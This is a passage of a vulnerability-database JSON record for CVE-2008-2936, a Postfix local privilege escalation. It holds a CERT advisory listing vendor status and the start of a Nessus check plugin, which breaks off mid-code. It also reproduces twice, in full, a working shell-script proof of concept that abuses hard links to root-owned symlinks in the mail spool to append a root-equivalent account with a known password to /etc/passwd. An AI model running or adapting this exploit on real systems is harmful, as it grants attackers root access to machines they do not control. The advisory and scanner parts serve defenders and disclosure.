[2008-08-31]", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:31:54", "description": "No description provided by source.", "published": "2008-08-31T00:00:00", "title": "Postfix &lt;= 2.6-20080814 (symlink) Local Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17321", "id": "SSV:17321", "sourceData": "\n #!/bin/sh\n#\n# &quot;rs_pocfix.sh&quot; (PoC for Postfix local root vulnerability: CVE-2008-2936)\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt &lt;roman@rs-labs.com&gt;\n#\n# Tested: Ubuntu / Debian\n#\n# [ Madrid, 30.Aug.2008 ]\n#\n\n# Config\n\nwritable_dir=/tmp\nspool_dir=/var/mail\t\t# Use &quot;postconf mail_spool_directory&quot; to obtain this\nuser=root\ntarget=/etc/passwd\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -&gt; at\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\nseconds=3\nuser_in_passwd=&quot;dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh&quot; # Pass is &quot;dsrrocks&quot;\npostfix=`which postfix`\t\t# /usr/sbin/postfix\npostconf=/usr/sbin/postconf\npostmap=/usr/sbin/postmap\n\n\n# Funcs\n\nquit()\n{\n echo &quot;$1&quot;\n exit\n}\n\n\n# Step 1: is my system vulnerable?\n\nhead -n 9 $0 | tail -n 8\nif [ $postfix ] ; then\n echo &quot;[*] Postfix seems to be installed&quot;\nelse\n quit &quot;[!] Are you sure Postfix is installed?&quot;\nfi\n\nmkdir -p $writable_dir/pocfix\ntouch $writable_dir/pocfix/src\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\n\nif [ -L $writable_dir/pocfix/dst2 ] ; then\n echo &quot;[*] Hardlink to symlink not dereferenced&quot;\n rm -rf $writable_dir/pocfix\nelse\n rm -rf $writable_dir/pocfix\n quit &quot;[!] Hardlink to symlink correctly dereferenced. System is not vulnerable&quot;\nfi\n\nif [ -d $spool_dir -a -w $spool_dir ] ; then\n echo &quot;[*] Spool dir is writable&quot;\nelse\n quit &quot;[!] Spool dir is not writable&quot;\nfi\n\nif [ -e $spool_dir/$user ] ; then\n rm -f $spool_dir/$user\n echo &quot;[*] Mailbox for \\&quot;$user\\&quot; found. Trying to delete it&quot;\n\n if [ -e $spool_dir/$user ] ; then\n quit &quot;[!] Couldn't delete it&quot;\n else\n echo &quot;[*] Deletion ok&quot;\n fi\n\nfi\n\nif [ -e $spool_dir/$useful_link_dst ] ; then\n rm -f $spool_dir/$useful_link_dst\n echo &quot;[*] Mailbox for \\&quot;$useful_link_dst\\&quot; found. Trying to delete it&quot;\n\n if [ -e $spool_dir/$useful_link_dst ] ; then\n quit &quot;[!] Couldn't delete it&quot;\n else\n echo &quot;[*] Deletion ok&quot;\n fi\n\nfi\n\naliases=`$postconf alias_database | cut -d&quot;=&quot; -f2`\n$postconf alias_maps | grep -q $aliases\nif [ $? -eq 0 ] ; then\n if [ $aliases ] ; then\n $postmap -q $user $aliases &gt; /dev/null\n if [ $? -eq 0 ] ; then\n quit &quot;[!] Mail alias for \\&quot;$user\\&quot; exists&quot;\n fi\n fi\nfi\n\nlda=`$postconf mailbox_command | cut -d&quot;=&quot; -f2`\nif [ $lda ] ; then\n quit &quot;[!] Non-Postfix LDA detected&quot;\nfi \n\n$postconf home_mailbox | grep -q '/$'\nif [ $? -eq 0 ] ; then\n quit &quot;[!] Maildir-style mailbox detected&quot;\nfi\n\n\n# Step 2: Exploiting\n\nln -f $useful_link $spool_dir/$user 2&gt; /dev/null || quit &quot;[!] Couldn't create hardlink (different partitions?)&quot;\nln -s -f $target $spool_dir/$useful_link_dst 2&gt; /dev/null || quit &quot;[!] Couldn't create symlink pointing to target file&quot;\ncp -f $target $writable_dir/pocfix_target_backup.$$ &amp;&amp; echo &quot;[*] Backed up: $target (saved as \\&quot;$writable_dir/pocfix_target_backup.$$\\&quot;)&quot;\necho &quot;[*] Sending mail ($seconds seconds wait)&quot;\necho $user_in_passwd | /usr/sbin/sendmail $user\n\nsleep $seconds\n\ndiff -q $target $writable_dir/pocfix_target_backup.$$ &gt; /dev/null\n\nif [ $? -eq 0 ] ; then\n echo &quot;[!] Exploit failed&quot;\nelse\n echo &quot;[*] Exploit successful (appended data to $target). Now \\&quot;su dsr\\&quot;, pass is \\&quot;dsrrocks\\&quot;)&quot;\nfi\n\nrm -f $spool_dir/$user\nrm -f $spool_dir/$useful_link_dst\n\n# milw0rm.com [2008-08-31]\n\n ", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17321"}, {"lastseen": "2017-11-19T15:41:39", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65680", "id": "SSV:65680", "sourceData": "\n #!/bin/sh\r\n#\r\n# &#34;rs_pocfix.sh&#34; (PoC for Postfix local root vulnerability: CVE-2008-2936)\r\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt &#60;roman@rs-labs.com&#62;\r\n#\r\n# Tested: Ubuntu / Debian\r\n#\r\n# [ Madrid, 30.Aug.2008 ]\r\n#\r\n\r\n# Config\r\n\r\nwritable_dir=/tmp\r\nspool_dir=/var/mail\t\t# Use &#34;postconf mail_spool_directory&#34; to obtain this\r\nuser=root\r\ntarget=/etc/passwd\r\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -&#62; at\r\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\r\nseconds=3\r\nuser_in_passwd=&#34;dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh&#34; # Pass is &#34;dsrrocks&#34;\r\npostfix=`which postfix`\t\t# /usr/sbin/postfix\r\npostconf=/usr/sbin/postconf\r\npostmap=/usr/sbin/postmap\r\n\r\n\r\n# Funcs\r\n\r\nquit()\r\n{\r\n echo &#34;$1&#34;\r\n exit\r\n}\r\n\r\n\r\n# Step 1: is my system vulnerable?\r\n\r\nhead -n 9 $0 | tail -n 8\r\nif [ $postfix ] ; then\r\n echo &#34;[*] Postfix seems to be installed&#34;\r\nelse\r\n quit &#34;[!] Are you sure Postfix is installed?&#34;\r\nfi\r\n\r\nmkdir -p $writable_dir/pocfix\r\ntouch $writable_dir/pocfix/src\r\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\r\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\r\n\r\nif [ -L $writable_dir/pocfix/dst2 ] ; then\r\n echo &#34;[*] Hardlink to symlink not dereferenced&#34;\r\n rm -rf $writable_dir/pocfix\r\nelse\r\n rm -rf $writable_dir/pocfix\r\n quit &#34;[!] Hardlink to symlink correctly dereferenced. System is not vulnerable&#34;\r\nfi\r\n\r\nif [ -d $spool_dir -a -w $spool_dir ] ; then\r\n echo &#34;[*] Spool dir is writable&#34;\r\nelse\r\n quit &#34;[!] Spool dir is not writable&#34;\r\nfi\r\n\r\nif [ -e $spool_dir/$user ] ; then\r\n rm -f $spool_dir/$user\r\n echo &#34;[*] Mailbox for \\&#34;$user\\&#34; found. Trying to delete it&#34;\r\n\r\n if [ -e $spool_dir/$user ] ; then\r\n quit &#34;[!] Couldn&#39;t delete it&#34;\r\n else\r\n echo &#34;[*] Deletion ok&#34;\r\n fi\r\n\r\nfi\r\n\r\nif [ -e $spool_dir/$useful_link_dst ] ; then\r\n rm -f $spool_dir/$useful_link_dst\r\n echo &#34;[*] Mailbox for \\&#34;$useful_link_dst\\&#34; found. Trying to delete it&#34;\r\n\r\n if [ -e $spool_dir/$useful_link_dst ] ; then\r\n quit &#34;[!] Couldn&#39;t delete it&#34;\r\n else\r\n echo &#34;[*] Deletion ok&#34;\r\n fi\r\n\r\nfi\r\n\r\naliases=`$postconf alias_database | cut -d&#34;=&#34; -f2`\r\n$postconf alias_maps | grep -q $aliases\r\nif [ $? -eq 0 ] ; then\r\n if [ $aliases ] ; then\r\n $postmap -q $user $aliases &#62; /dev/null\r\n if [ $? -eq 0 ] ; then\r\n quit &#34;[!] Mail alias for \\&#34;$user\\&#34; exists&#34;\r\n fi\r\n fi\r\nfi\r\n\r\nlda=`$postconf mailbox_command | cut -d&#34;=&#34; -f2`\r\nif [ $lda ] ; then\r\n quit &#34;[!] Non-Postfix LDA detected&#34;\r\nfi \r\n\r\n$postconf home_mailbox | grep -q &#39;/$&#39;\r\nif [ $? -eq 0 ] ; then\r\n quit &#34;[!] Maildir-style mailbox detected&#34;\r\nfi\r\n\r\n\r\n# Step 2: Exploiting\r\n\r\nln -f $useful_link $spool_dir/$user 2&#62; /dev/null || quit &#34;[!] Couldn&#39;t create hardlink (different partitions?)&#34;\r\nln -s -f $target $spool_dir/$useful_link_dst 2&#62; /dev/null || quit &#34;[!] Couldn&#39;t create symlink pointing to target file&#34;\r\ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo &#34;[*] Backed up: $target (saved as \\&#34;$writable_dir/pocfix_target_backup.$$\\&#34;)&#34;\r\necho &#34;[*] Sending mail ($seconds seconds wait)&#34;\r\necho $user_in_passwd | /usr/sbin/sendmail $user\r\n\r\nsleep $seconds\r\n\r\ndiff -q $target $writable_dir/pocfix_target_backup.$$ &#62; /dev/null\r\n\r\nif [ $? -eq 0 ] ; then\r\n echo &#34;[!] Exploit failed&#34;\r\nelse\r\n echo &#34;[*] Exploit successful (appended data to $target). Now \\&#34;su dsr\\&#34;, pass is \\&#34;dsrrocks\\&#34;)&#34;\r\nfi\r\n\r\nrm -f $spool_dir/$user\r\nrm -f $spool_dir/$useful_link_dst\r\n\r\n# milw0rm.com [2008-08-31]\r\n\n ", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65680"}], "cert": [{"lastseen": "2020-09-18T20:41:14", "bulletinFamily": "info", "cvelist": ["CVE-2008-2936"], "description": "### Overview \n\nThe Postfix MTA contains a local privilege escalation vulnerability.\n\n### Description \n\nPostfix is an mail transport agent (`MTA`) that is used by several Unix-like operating systems. Symbolic links and hard links are types of files that reference other files. Unlike hard links, symbolic links can point to directories and use relative pathnames.\n\nOn some non-POSIX.1-2001 and X/Open XPG4v2 compliant systems, users can hardlink symlinks which are owned by the root user. Postfix allows root-owned symlinks to be used as a mail destination folder. A hard link to a Postfix root-owned symlink could point to a file that can be overwritten by Postfix, regardless of the permissions of the destination file. \n \n--- \n \n### Impact \n\nA local, authenticated attacker may be able to overwrite arbitrary files, possibly gaining elevated privileges. \n \n--- \n \n### Solution \n\n**Upgrade** \nSee <http://article.gmane.org/gmane.mail.postfix.announce/110> for information about obtaining updated software. Users who do not compile Postfix from source should see the systems affected section below for a partial list of affected vendors. \n \n--- \n \n \n**Set mailbox permissions** \n \nMaking the system mail spool directory root-owned may mitigate this vulnerability. See <http://article.gmane.org/gmane.mail.postfix.announce/110> for specific information about this and other workarounds. \n \n--- \n \n### Vendor Information\n\n938323\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Gentoo Linux __ Affected\n\nNotified: August 01, 2008 Updated: August 18, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.gentoo.org/security/en/glsa/glsa-200808-12.xml> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: August 01, 2008 Updated: August 18, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://archives.mandrivalinux.com/security-announce/2008-08/msg00014.php> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: August 01, 2008 Updated: August 18, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00002.html> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### Ubuntu __ Affected\n\nNotified: August 01, 2008 Updated: August 19, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.ubuntu.com/usn/usn-74-2> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### DragonFly BSD Project Not Affected\n\nNotified: August 01, 2008 Updated: August 02, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. __ Not Affected\n\nNotified: August 01, 2008 Updated: August 19, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nSun products do not bundle the Postfix mailer and hence we are not affected by this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSun systems with third party or unofficial Postifx packages (<http://www.postfix.org/packages.html>) may be vulnerable. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### Apple Computer, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 19, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <ftp://ftp.porcupine.org/mirrors/postfix-release/index/html>\n * <http://article.gmane.org/gmane.mail.postfix.announce/110>\n * <http://linuxgazette.net/105/pitcher.html>\n * <http://en.wikipedia.org/wiki/Hard_links>\n * <http://en.wikipedia.org/wiki/Symbolic_link>\n\n### Acknowledgements\n\nThanks to Wietse Venema for information that was used in this report. Sebastian Krahmer of SuSE is credited for discovering and reporting this issue.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-2936](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-2936>) \n---|--- \n**Severity Metric:** | 4.20 \n**Date Public:** | 2008-08-18 \n**Date First Published:** | 2008-08-18 \n**Date Last Updated: ** | 2008-08-19 14:52 UTC \n**Document Revision: ** | 20 \n", "modified": "2008-08-19T14:52:00", "published": "2008-08-18T00:00:00", "id": "VU:938323", "href": "https://www.kb.cert.org/vuls/id/938323", "type": "cert", "title": "Postfix local privilege escalation", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T11:51:56", "description": "Sebastian Krahmer of the SUSE Security Team discovered a flaw in the\nway Postfix dereferenced symbolic links. If a local user had write\naccess to a mail spool directory without a root mailbox file, it could\nbe possible for them to append arbitrary data to files that root had\nwrite permissions to (CVE-2008-2936).\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : postfix (MDVSA-2008:171)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:postfix-pcre", "cpe:/o:mandriva:linux:2007.1", "cpe:/o:mandriva:linux:2008.1", "p-cpe:/a:mandriva:linux:postfix-pgsql", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:postfix", "p-cpe:/a:mandriva:linux:libpostfix1", "p-cpe:/a:mandriva:linux:postfix-mysql", "p-cpe:/a:mandriva:linux:lib64postfix1", "p-cpe:/a:mandriva:linux:postfix-ldap"], "id": "MANDRIVA_MDVSA-2008-171.NASL", "href": "https://www.tenable.com/plugins/nessus/37883", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:171. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37883);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"MDVSA\", value:\"2008:171\");\n\n script_name(english:\"Mandriva Linux Security Advisory : postfix (MDVSA-2008:171)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer of the SUSE Security Team discovered a flaw in the\nway Postfix dereferenced symbolic links. If a local user had write\naccess to a mail spool directory without a root mailbox file, it could\nbe possible for them to append arbitrary data to files that root had\nwrite permissions to (CVE-2008-2936).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64postfix1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpostfix1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-pcre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", 